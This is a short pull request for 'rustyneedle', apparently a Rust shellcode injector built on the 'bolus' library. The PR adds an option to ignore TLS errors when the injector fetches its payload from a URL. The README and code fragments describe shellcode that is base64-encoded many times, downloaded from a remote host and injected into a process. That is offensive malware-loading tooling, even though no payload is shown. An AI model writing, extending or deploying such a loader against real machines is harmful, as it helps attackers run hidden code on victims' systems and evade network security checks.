### PR TITLE
Update to support ignore_ssl option

### DIFF
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,12 +1,12 @@
 [package]
 name = "rustyneedle"
-version = "0.2.0"
+version = "0.3.0"
 edition = "2021"
 
 # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 
 [dependencies]
-bolus = "0.1.1"
+bolus = "0.3.0"
 
 [profile.dev]
 opt-level = 0

--- a/README.md
+++ b/README.md
@@ -21,6 +21,7 @@ python3 encode.py [SHELLCODE_FILE] [B64_ITERATIONS] [OUT_FILE]
 * `SHELLCODE_FILE`: raw shellcode file to encode
 * `B64_ITERATIONS`: # of times to base64-encode the shellcode
 * `OUT_FILE`: Resulting text file of the encoded shellcode. **NOTE:** this will be many times larger than the source!
+* `IGNORE_SSL`: Ignores SSL/TLS errors.
 
 ### Alternative usage
 

--- a/src/main.rs
+++ b/src/main.rs
@@ -18,6 +18,8 @@ const B64_ITERATIONS: usize = 3;
 const PROCESS_NAME: &str = "";
 /// `WaitForSingleObject` Switch. Usually you want this
 const WAIT_FOR_SINGLE_OBJECT: bool = true;
+/// `IgnoreSSL` switch. You know what this does.
+const IGNORE_SSL: bool = false;
 
 fn main() -> Result<(), String> {
     let injection_type = match PROCESS_NAME {
@@ -27,6 +29,7 @@ fn main() -> Result<(), String> {
     let injector = load(
         InjectorType::Base64Url((
             URL.to_string(),
+            IGNORE_SSL,
             B64_ITERATIONS
         ))
     )?;


### PR DESCRIPTION
This PR updates rustyneedle to support ignore_ssl option added to bolus 0.3.0.